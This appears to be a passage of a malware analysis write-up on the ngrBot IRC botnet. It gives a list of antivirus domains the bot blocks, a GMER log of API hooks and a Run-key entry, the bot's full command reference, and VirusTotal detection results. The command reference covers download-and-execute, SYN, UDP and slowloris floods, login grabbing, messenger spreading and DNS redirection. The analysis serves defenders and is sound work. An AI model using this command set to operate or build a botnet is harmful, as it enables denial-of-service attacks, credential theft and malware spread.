ftp.securityresponse.symantec.com | dnl-ru14.kaspersky-labs.com | u55.eset.com | download924.avast.com | ftp.symantecliveupdate.com | ftp.symatec.com | ftp.trendmicro.com | dnl-ru15.kaspersky-labs.com | u72.eset.com | ftp.uk.trendmicro-europe.com | ftp.update.symantec.com | ftp.updates.symantec.com | u16.eset.com | dnl-ru2.kaspersky-labs.com | u73.eset.com | u17.eset.com | u18.eset.com | u74.eset.com | u75.eset.com | dnl-ru3.kaspersky-labs.com | u76.eset.com | u77.eset.com | u86.eset.com | u87.eset.com | u88.eset.com | dnl-ru4.kaspersky-labs.com | u89.eset.com | u9.eset.com | u90.eset.com | pcav.cn | u92.eset.com | u93.eset.com | dnl-ru5.kaspersky-labs.com | u94.eset.com | u95.eset.com | u96.eset.com | u97.eset.com | u99.eset.com | dnl-ru6.kaspersky-labs.com | up.duba.net | up.rising.com.cn | abuse.ch | up1.nod123.cn | upd.zonelabs.com | dnl-ru7.kaspersky-labs.com | update.aladdin.com | update.authentium.com | update.avg.com | backup.avg.cz | backup.grisoft.cz | download.avg.cz | update.avgfrance.com | dnl-ru8.kaspersky-labs.com | update.bitdefender.com | update.drweb.com | update.ewido.com | agfirewall.ru | update.grisoft.com | update.grisoft.cz | dnl-ru9.kaspersky-labs.com | update.hispasec.com | update.ikarus-software.at | update.quickheal.com | update.rising.com.cn | dnl-us1.kaspersky-labs.com | update.trendmicro.com | update7.jiangmin.com | agnitum.de | updates.drweb.com | dnl-us10.kaspersky-labs.com | updates.f-prot.com | agnitum.fr | download708.avast.com | upgrade1.bitdefender.com | upgrade2.bitdefender.com | agnitum.ru | download709.avast.com | upgrade3.bitdefender.com | upgrade4.bitdefender.com | ahnlab.com | download72.avast.com | download73.avast.com | download74.avast.com | download900.avast.com | download901.avast.com | download902.avast.com | download903.avast.com | ahn.com.cn | download904.avast.com | vncsvr.com | download905.avast.com | download906.avast.com | download907.avast.com | download908.avast.com | download909.avast.com | virusbuster.hu | download91.avast.com | download910.avast.com | download911.avast.com | download912.avast.com | download913.avast.com | download914.avast.com | atwola.com | download915.avast.com | download916.avast.com | download917.avast.com | download918.avast.com | download919.avast.com | download92.avast.com | bitdefender.co.uk | download921.avast.com | jotti.org | alert.rising.com.cn | antispy.ru | arcabit.com | arcabit.pl | ashampoo.com | avast.ru | avg.com | avgate.net | dnl-eu10.kaspersky-labs.com | bbs.360.cn | dnl-jp14.kaspersky-labs.com | bbs.cpcw.com | bbs.dswlab.com | neuber.com | processlibrary.com | dnl-jp15.kaspersky-labs.com | dnl-cn2.kaspersky-labs.com | dnl-jp2.kaspersky-labs.com | dnl-cn3.kaspersky-labs.com | dnl-jp3.kaspersky-labs.com | dnl-cn4.kaspersky-labs.com | dnl-jp4.kaspersky-labs.com | dnl-cn5.kaspersky-labs.com | dnl-cn6.kaspersky-labs.com | dnl-jp5.kaspersky-labs.com | dnl-cn7.kaspersky-labs.com | dnl-cn8.kaspersky-labs.com | dnl-cn9.kaspersky-labs.com | dnl-jp6.kaspersky-labs.com | dnl-eu1.kaspersky-labs.com | dnl-eu11.kaspersky-labs.com | dnl-eu12.kaspersky-labs.com | dnl-jp7.kaspersky-labs.com | dnl-eu13.kaspersky-labs.com | dnl-eu14.kaspersky-labs.com | dnl-eu15.kaspersky-labs.com | dnl-jp8.kaspersky-labs.com | dnl-eu2.kaspersky-labs.com | dnl-eu3.kaspersky-labs.com | dnl-eu4.kaspersky-labs.com | dnl-jp9.kaspersky-labs.com | dnl-eu5.kaspersky-labs.com | dnl-eu6.kaspersky-labs.com | dnl-eu7.kaspersky-labs.com | dnl-kr1.kaspersky-labs.com | dnl-eu8.kaspersky-labs.com | dnl-eu9.kaspersky-labs.com | dnl-jp1.kaspersky-labs.com | dnl-kr10.kaspersky-labs.com | dnl-jp10.kaspersky-labs.com | dnl-jp11.kaspersky-labs.com | dnl-jp12.kaspersky-labs.com | dnl-kr11.kaspersky-labs.com | dnl-jp13.kaspersky-labs.com | dnl-kr12.kaspersky-labs.com | dnl-kr13.kaspersky-labs.com | dnl-kr15.kaspersky-labs.com | dnl-kr2.kaspersky-labs.com | dnl-kr3.kaspersky-labs.com | dnl-kr4.kaspersky-labs.com | dnl-kr5.kaspersky-labs.com | dnl-kr6.kaspersky-labs.com | dnl-kr8.kaspersky-labs.com | dnl-kr9.kaspersky-labs.com | dnl-ru10.kaspersky-labs.com | dnl-ru11.kaspersky-labs.com | dnl-ru12.kaspersky-labs.com

Gmer Scan

I left only 2 processes in the scan to reduce the size of the log.

00.---- User code sections - GMER 1.0.14 ----
01. 
02..text           C:\WINDOWS\Explorer.EXE[1212] ntdll.dll!NtEnumerateValueKey                                                          7C90D976 5 Bytes  JMP 00D323F0
03..text           C:\WINDOWS\Explorer.EXE[1212] ntdll.dll!NtQueryDirectoryFile                                                         7C90DF5E 5 Bytes  JMP 00D32690
04..text           C:\WINDOWS\Explorer.EXE[1212] ntdll.dll!NtResumeThread                                                               7C90E45F 5 Bytes  JMP 00D3D2AA
05..text           C:\WINDOWS\Explorer.EXE[1212] ntdll.dll!LdrLoadDll                                                                   7C9161CA 5 Bytes  JMP 00D3D166
06..text           C:\WINDOWS\Explorer.EXE[1212] kernel32.dll!CreateFileA                                                               7C801A24 5 Bytes  JMP 00D311C0
07..text           C:\WINDOWS\Explorer.EXE[1212] kernel32.dll!CreateFileW                                                               7C810976 5 Bytes  JMP 00D31400
08..text           C:\WINDOWS\Explorer.EXE[1212] kernel32.dll!MoveFileA                                                                 7C822294 5 Bytes  JMP 00D322F0
09..text           C:\WINDOWS\Explorer.EXE[1212] kernel32.dll!CopyFileW                                                                 7C825779 5 Bytes  JMP 00D310A0
10..text           C:\WINDOWS\Explorer.EXE[1212] kernel32.dll!CopyFileA                                                                 7C830053 5 Bytes  JMP 00D31000
11..text           C:\WINDOWS\Explorer.EXE[1212] kernel32.dll!MoveFileW                                                                 7C839659 5 Bytes  JMP 00D32350
12..text           C:\WINDOWS\Explorer.EXE[1212] ADVAPI32.dll!RegCreateKeyExW                                                           77DD7535 5 Bytes  JMP 00D32D00
13..text           C:\WINDOWS\Explorer.EXE[1212] ADVAPI32.dll!RegCreateKeyExA                                                           77DDEAF4 5 Bytes  JMP 00D32B60
14..text           C:\WINDOWS\Explorer.EXE[1212] WININET.dll!HttpSendRequestW                                                           6301F73E 5 Bytes  JMP 00D31EA0
15..text           C:\WINDOWS\Explorer.EXE[1212] WININET.dll!HttpSendRequestA                                                           6302E822 5 Bytes  JMP 00D31C40
16..text           C:\WINDOWS\Explorer.EXE[1212] WININET.dll!InternetWriteFile                                                          6307665E 5 Bytes  JMP 00D32100
17..text           C:\WINDOWS\Explorer.EXE[1212] WS2_32.dll!getaddrinfo                                                                 71AB2A6F 5 Bytes  JMP 00D31B60
18..text           C:\WINDOWS\Explorer.EXE[1212] WS2_32.dll!send                                                                        71AB428A 5 Bytes  JMP 00D32E60
19..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] ntdll.dll!NtEnumerateValueKey                                  7C90D976 5 Bytes  JMP 001523F0
20..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] ntdll.dll!NtQueryDirectoryFile                                 7C90DF5E 5 Bytes  JMP 00152690
21..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] ntdll.dll!NtResumeThread                                       7C90E45F 5 Bytes  JMP 0015D2AA
22..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] ntdll.dll!LdrLoadDll                                           7C9161CA 5 Bytes  JMP 0015D166
23..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] kernel32.dll!CreateFileA                                       7C801A24 5 Bytes  JMP 001511C0
24..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] kernel32.dll!CreateFileW                                       7C810976 5 Bytes  JMP 00151400
25..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] kernel32.dll!MoveFileA                                         7C822294 5 Bytes  JMP 001522F0
26..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] kernel32.dll!CopyFileW                                         7C825779 5 Bytes  JMP 001510A0
27..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] kernel32.dll!CopyFileA                                         7C830053 5 Bytes  JMP 00151000
28..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] kernel32.dll!MoveFileW                                         7C839659 5 Bytes  JMP 00152350
29..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] ADVAPI32.dll!RegCreateKeyExW                                   77DD7535 5 Bytes  JMP 00152D00
30..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] ADVAPI32.dll!RegCreateKeyExA                                   77DDEAF4 5 Bytes  JMP 00152B60
31..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] USER32.dll!CallNextHookEx                                      77D4ED6E 5 Bytes  JMP 00EADD81 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
32..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] USER32.dll!CreateWindowExW                                     77D51AD5 5 Bytes  JMP 00EB4832 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
33..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] USER32.dll!DialogBoxParamW                                     77D56702 5 Bytes  JMP 00DD9315 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
34..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] USER32.dll!DialogBoxParamA                                     77D588E1 5 Bytes  JMP 00FCDFBE C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
35..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] USER32.dll!DialogBoxIndirectParamW                             77D62598 5 Bytes  JMP 00FCE021 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
36..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] USER32.dll!MessageBoxIndirectA                                 77D6AEF1 5 Bytes  JMP 00FCDF51 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
37..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] USER32.dll!SetWindowsHookExW                                   77D6E621 5 Bytes  JMP 00EADBCB C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
38..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] USER32.dll!UnhookWindowsHookEx                                 77D6F29F 5 Bytes  JMP 00E11CA2 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
39..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] USER32.dll!MessageBoxExW                                       77D80559 5 Bytes  JMP 00FCDE22 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
40..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] USER32.dll!MessageBoxExA                                       77D8057D 5 Bytes  JMP 00FCDE84 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
41..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] USER32.dll!DialogBoxIndirectParamA                             77D86CED 5 Bytes  JMP 00FCE084 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
42..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] USER32.dll!MessageBoxIndirectW                                 77D960B7 5 Bytes  JMP 00FCDEE6 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
43..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] ole32.dll!CoCreateInstance                                     77526009 5 Bytes  JMP 00EB488E C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
44..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] WININET.dll!HttpSendRequestW                                   6301F73E 5 Bytes  JMP 00151EA0
45..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] WININET.dll!HttpSendRequestA                                   6302E822 5 Bytes  JMP 00151C40
46..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] WININET.dll!InternetWriteFile                                  6307665E 5 Bytes  JMP 00152100
47..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] WS2_32.dll!getaddrinfo                                         71AB2A6F 5 Bytes  JMP 00151B60
48..text           C:\Program Files\Internet Explorer\iexplore.exe[1404] WS2_32.dll!send                                                71AB428A 5 Bytes  JMP 00152E60
49. 
50.---- User IAT/EAT - GMER 1.0.14 ----
51. 
52.IAT             C:\Program Files\Internet Explorer\iexplore.exe[1404] @ C:\WINDOWS\system32\ole32.dll [KERNEL32.dll!LoadLibraryExW]  [019718FD] C:\Program Files\Internet Explorer\xpshims.dll (Internet Explorer Compatibility Shims for XP/Microsoft Corporation)
53. 
54.---- Registry - GMER 1.0.14 ----
55. 
56.Reg             HKCU\Software\Microsoft\Windows\CurrentVersion\Run@Vgbkbf                                                            C:\Documents and Settings\[UserName]\Application Data\Vgbkbf.exe
57. 
58.---- Files - GMER 1.0.14 ----
59. 
60.File            C:\Documents and Settings\{UserName]\Application Data\Vgbkbf.exe                                                            169472 bytes
61. 
62.---- EOF - GMER 1.0.14 ----
ngrBot Commands
view sourceprint?
000.Note: parameters within "[" and "]" are required, and parameters within "<" and ">" are optional.
001. 
002.!dl [url] <-r> <-n>
003. 
004.The bot downloads and executes a file from the specified URL.
005. 
006.Parameters
007.url        URL of the file to download and execute
008.md5        optional MD5 hash of the file to download for integrity check, the bot will not redownload a file with the same hash until reboot
009.-r        Enable RusKill on downloaded file
010.-n        Disables PDef+ on the system until reboot or until it is manually re-enabled
011. 
012.-------------------------
013. 
014.!up [url] [md5] <-r>
015. 
016.The bot updates its file, but the update does not take effect until the system is restarted.
017. 
018.Parameters
019.url        URL of the file to update to
020.md5        MD5 hash of the update file
021.-r        Reboot immediately
022. 
023.-------------------------
024. 
025.!die
026. 
027.The bot disconnects from the IRC server and does not reconnect until its system reboots.
028. 
029.-------------------------
030. 
031.!rm
032. 
033.The bot will remove itself from the system.
034. 
035.-------------------------
036. 
037.!m [state]
038. 
039.Enable/disable all output to IRC regarding to commands and features.
040. 
041.Parameters
042.state    Enable (on) or disable (off) muting of all output to IRC
043. 
044.-------------------------
045. 
046.!v
047. 
048.The bot displays its version, customer name, the MD5 hash of its file, and its installed filepath.
049. 
050.-------------------------
051. 
052.!vs [url] [state]
053. 
054.The bot creates a browser instance and visits the specified link.
055. 
056.Parameters
057.url        URL to open
058.state    Open in a visible (1) or invisible (0) window
059. 
060.-------------------------
061. 
062.!rc <-n|-g>
063. 
064.The bot disconnects from the IRC server and waits 15 seconds before reconnecting.
065. 
066.Parameters
067.-n    Only reconnect if the bot is currently marked as "new"
068.-g    Only reconnect if the bot did not previously succeed in determining its country using GeoIP
069. 
070.-------------------------
071. 
072.!j [<[rule] [options]> channel]
073. 
074.The bot joins the specified channel. If rules are specified, the bot will only join if the rules apply to it.
075. 
076.Parameters
077.rule        Optional rule for the bot to check for. Supported options are -c (country) and -v (version)
078.options        Options for selected rule
079.With -c,     you can put a single or multiple comma-separated country code(s)
080.With -v,     you can put a single or multiple comma-separated version(s)
081.channel        Channel to join
082.key            Key of channel to join
083. 
084.-------------------------
085. 
086.!p [<[rule] [options]> channel]
087. 
088.The bot parts the specified channel.
089. 
090.Parameters
091.rule        Optional rule for the bot to check for. Supported options are -c (country) and -v (version)
092.options        Options for selected rule
093.With -c,     you can put a single or multiple comma-separated country code(s)
094.With -v,     you can put a single or multiple comma-separated version(s)
095.channel        Channel to part
096. 
097.-------------------------
098. 
099.!s
100. 
101.The bot joins the channel for its country (e.g. Russian bots (RU) join #RU).
102. 
103.Parameters
104.rule    Optional rule for the bot to sort by instead of country. Supported options are -o (operating system), -n (new/old), -u (admin/user), and -v (version)
105. 
106.-------------------------
107. 
108.!us
109. 
110.The bot parts the channel for its country (e.g. Russian bots (RU) part #RU).
111. 
112.Parameters
113.rule    Optional rule for the bot to unsort by instead of country. Supported options are -o (operating system), -n (new/old), -u (admin/user), and -v (version)
114. 
115.-------------------------
116. 
117.!mod [module] [state]
118. 
119.Enable/disable modules that use hooks.
120.Note: disabling bdns will only unblock AV and other preset sites, not sites set using the !mdns command.
121. 
122.Parameters
123.module        Module to change. Supported modules: msn, msnu, pdef, iegrab, ffgrab, ftpgrab, bdns, usbi
124.state        Enable (on) or disable (off) module
125. 
126.-------------------------
127. 
128.!stats <-l|-s>
129. 
130.Retrieves statistics for spreading and/or login grabbing. If no parameters are specified, it will display both.
131. 
132.Parameters
133.-l    Display login grabber stats
134.-s    Display spreading stats
135. 
136.-------------------------
137. 
138.!logins
139. 
140.Retrieves all grabbed and cached logins and prints them to channel or PM. Can also be used to clear login cache.
141. 
142.Parameters
143.site    Site to retrieve logins for (case insensitive, see here for the list of sites)
144.-c        Clear login cache
145. 
146.-------------------------
147. 
148.!stop
149. 
150.The bot will end all running flood tasks.
151. 
152.-------------------------
153. 
154.!ssyn [host] [port] [seconds]
155. 
156.Parameters
157.host        Host to flood with SYN requests
158.port        Port to flood. If 0, the bot uses a random port
159.seconds        Number of seconds to flood the target
160. 
161.-------------------------
162. 
163.!udp [host] [port] [seconds]
164. 
165.Parameters
166.host        Host to flood with UDP packets
167.port        Port to flood. If 0, the bot uses a random port
168.seconds        Number of seconds to flood the target
169. 
170.-------------------------
171. 
172.!slow [host] [minutes]
173. 
174.Parameters
175.host        Host to flood using slowloris
176.minutes        Number of minutes to flood the target
177. 
178.-------------------------
179. 
180.!msn.int [interval]
181. 
182.Set the number of MSN messages in a conversation before one is changed with your spreading message. See here for more information.
183.Note: use '#' for a random interval between 1 and 9.
184. 
185.Parameters
186.interval    Number of MSN messages before spread
187. 
188.-------------------------
189. 
190.!msn.set [message]
191. 
192.Set the message that will be used for MSN spreading. See here for more information.
193.Note: use '#' for a random digit and '*' for a random lowercase letter.
194. 
195.Parameters
196.message        Message to spread via MSN
197. 
198.-------------------------
199. 
200.!http.int [interval]
201. 
202.Set the number of Facebook messages in a conversation before one is changed with your spreading message. See here for more information.
203.Note: use '#' for a random interval between 1 and 9.
204. 
205.Parameters
206.interval    Number of Facebook messages before spread
207. 
208.-------------------------
209. 
210.!http.set [message]
211. 
212.Set the message that will be used for Facebook spreading. See here for more information.
213.Note: use '#' for a random digit and '*' for a random lowercase letter.
214. 
215.Parameters
216.message        Message to spread via Facebook
217. 
218.-------------------------
219. 
220.!mdns [url|[domain1 ]|[ip1 ]]
221. 
222.The bot will block access to or redirect the specified domain/IP address.
223.Note: domain to domain, domain to IP address, and IP address to IP address redirects work. IP address to domain redirection does not yet work.
224.Note: it must be the exact domain, for example "example.com" will not include "". Wildcard support will be added in an update.
225. 
226.Parameters
227.url            Plaintext file with one redirect/blocking rule per line, rules are formatted in the same way as the command parameters.
228.domain1        Requests for this domain will be redirected to domain2 or ip2 if they are set, otherwise it is blocked
229.ip1            Requests for this IP address will be redirected to ip2 if it is set, otherwise it is blocked
230.domain2        DNS queries for domain1 will be redirected to this domain if set
231.ip2            DNS queries for ip1 or domain1 will be redirected to this IP address if set
«StartPrev12NextEnd»


VirusTotal Results
stopmalvertising.com
facebook-pic0008422012.exe
Additional information
MD5: 617fc475c1f0120571d8f21493f60959
SHA1: e3fcfa0fe9ac759be324479e0a861f8a303b9ff1
SHA256:128f4e7f429a8a8c785f3d3f46829ee756ce2f8d7cd509c326183966c5d318ae
File size: 169472 bytes
Scan date: 2011-08-03 13:21:51 (UTC)
AntivirusVersionLast updateResult
AhnLab-V32011.08.03.022011.08.03-
AntiVir7.11.12.2002011.08.03-
Antiy-AVL2.0.3.72011.08.03-
Avast4.8.1351.02011.08.03-
Avast55.0.677.02011.08.03-
AVG10.0.0.11902011.08.03SHeur3.CMHH
BitDefender7.22011.08.03Gen:Variant.FakeAlert.75
CAT-QuickHeal11.002011.08.03-
ClamAV0.97.0.02011.08.03-
Commtouch5.3.2.62011.08.03-
Comodo96142011.08.03-
DrWeb5.0.2.033002011.08.03-
Emsisoft5.1.0.82011.08.03-
eSafe7.0.17.02011.08.03-
eTrust-Vet36.1.84792011.08.02-
F-Prot4.6.2.1172011.08.03-
F-Secure9.0.16440.02011.08.03Gen:Variant.FakeAlert.75
Fortinet4.2.257.02011.08.03-
GData222011.08.03Gen:Variant.FakeAlert.75
IkarusT3.1.1.104.02011.08.03-
Jiangmin13.0.9002011.08.02-
K7AntiVirus9.109.49732011.08.02-
Kaspersky9.0.0.8372011.08.03UDS:DangerousObject.Multi.Generic
McAfee5.400.0.11582011.08.03-
McAfee-GW-Edition2010.1D2011.08.03Heuristic.LooksLike.Win32.Suspicious.C
Microsoft1.71042011.08.03-
NOD3263462011.08.03a variant of Win32/Injector.IIF
Norman6.07.102011.08.03-
nProtect2011-08-03.042011.08.03Gen:Variant.FakeAlert.75
Panda10.0.3.52011.08.03Suspicious file
PCTools8.0.0.52011.08.03-
Prevx3.02011.08.03-
Rising23.69.02.032011.08.03Suspicious
Sophos4.67.02011.08.03-
SUPERAntiSpyware4.40.0.10062011.08.03Trojan.Agent/Gen-Falcomp
Symantec20111.1.0.1862011.08.03-
TheHacker6.7.0.1.2692011.08.03-
TrendMicro9.200.0.10122011.08.03-
TrendMicro-HouseCall9.200.0.10122011.08.03-
VBA323.12.16.42011.08.03-
VIPRE100512011.08.03-
ViRobot2011.8.3.46032011.08.03-
VirusBuster14.0.150.02011.08.02-
stopmalvertising.com
milkway.exe - 1.tmp
Additional information
MD5: a17c070c23a4b8be33466d735b460551
SHA1: 8d861e95525081603101b0fc129ed9c135bd226f
SHA256:960c2aa3408c6729d557337893cfba65b6565551c32f1a506e50e1fc72279397
File size: 118784 bytes
Scan date: 2011-08-03 16:36:48 (UTC)
AntivirusVersionLast updateResult
AntiVir7.11.12.2022011.08.03-
Antiy-AVL2.0.3.72011.08.03-
Avast4.8.1351.02011.08.03-
Avast55.0.677.02011.08.03-
CAT-QuickHeal11.002011.08.03-
ClamAV0.97.0.02011.08.03-
Commtouch5.3.2.62011.08.03-
Comodo96172011.08.03-
eSafe7.0.17.02011.08.03-
eTrust-Vet36.1.84812011.08.03-
F-Prot4.6.2.1172011.08.03-
Fortinet4.2.257.02011.08.03W32/Injector.HCR!tr
IkarusT3.1.1.104.02011.08.03-
Jiangmin13.0.9002011.08.03-
K7AntiVirus9.109.49732011.08.02-
Kaspersky9.0.0.8372011.08.03Trojan-Dropper.Win32.Injector.ahk
McAfee5.400.0.11582011.08.03-
McAfee-GW-Edition2010.1D2011.08.03-
Microsoft1.71042011.08.03-
NOD3263472011.08.03-
Norman6.07.102011.08.03-
nProtect2011-08-03.042011.08.03-
PCTools8.0.0.52011.08.03-
Prevx3.02011.08.03-
Rising23.69.02.032011.08.03-
Sophos4.67.02011.08.03-
SUPERAntiSpyware4.40.0.10062011.08.03-
Symantec20111.1.0.1862011.08.03-
TheHacker6.7.0.1.2692011.08.03-
TrendMicro9.200.0.10122011.08.03-
TrendMicro-HouseCall9.200.0.10122011.08.03-
VBA323.12.16.42011.08.03-
VIPRE100532011.08.03Trojan.Win32.Generic.pak!cobra
ViRobot2011.8.3.46032011.08.03-
VirusBuster14.0.150.02011.08.02-
stopmalvertising.com
memory.exe - windows.exe
Additional information
MD5: 0d8da66c26b7c8ab1c0b447f8fbcbf07
SHA1: b0c1b7f366173d1c455f53d641a28b5b5c0563bf
SHA256:fdc8db0fea65a7d81e3bc151b19f05f93ab278f095fc7a88545f36497f8459da
File size: 122880 bytes
Scan date: 2011-08-03 11:22:09 (UTC)
AntivirusVersionLast updateResult
AhnLab-V32011.08.03.012011.08.03-
AntiVir7.11.12.2002011.08.03-
Antiy-AVL2.0.3.72011.08.03-
Avast4.8.1351.02011.08.02-
Avast55.0.677.02011.08.02-
AVG10.0.0.11902011.08.03-
BitDefender7.22011.08.03-
CAT-QuickHeal11.002011.08.03-
ClamAV0.97.0.02011.08.03-
Commtouch5.3.2.62011.08.03-
Comodo96112011.08.03-
DrWeb5.0.2.033002011.08.03-
Emsisoft5.1.0.82011.08.03-
eSafe7.0.17.02011.08.03-
eTrust-Vet36.1.84792011.08.02-
F-Prot4.6.2.1172011.08.03-
F-Secure9.0.16440.02011.08.03-
Fortinet4.2.257.02011.08.03W32/Injector.HCR!tr
GData222011.08.03-
IkarusT3.1.1.104.02011.08.03-
Jiangmin13.0.9002011.08.02-
K7AntiVirus9.109.49732011.08.02-
Kaspersky9.0.0.8372011.08.03-
McAfee5.400.0.11582011.08.03-
McAfee-GW-Edition2010.1D2011.08.03-
Microsoft1.71042011.08.03-
NOD3263462011.08.03-
Norman6.07.102011.08.03-
nProtect2011-08-03.042011.08.03-
Panda10.0.3.52011.08.02-
PCTools8.0.0.52011.08.03-
Prevx3.02011.08.03-
Rising23.69.02.032011.08.03-
Sophos4.67.02011.08.03-
SUPERAntiSpyware4.40.0.10062011.08.03-
Symantec20111.1.0.1862011.08.03-
TheHacker6.7.0.1.2672011.08.02-
TrendMicro9.200.0.10122011.08.03-
TrendMicro-HouseCall9.200.0.10122011.08.03-
VBA323.12.16.42011.08.02-
VIPRE100502011.08.03-
ViRobot2011.8.3.46032011.08.03-
VirusBuster14.0.150.02011.08.02-


上一篇:Stuxnet's Footprint in Memory with Volatility 2.0
下一篇:Mebromi: the first BIOS rootkit in the wild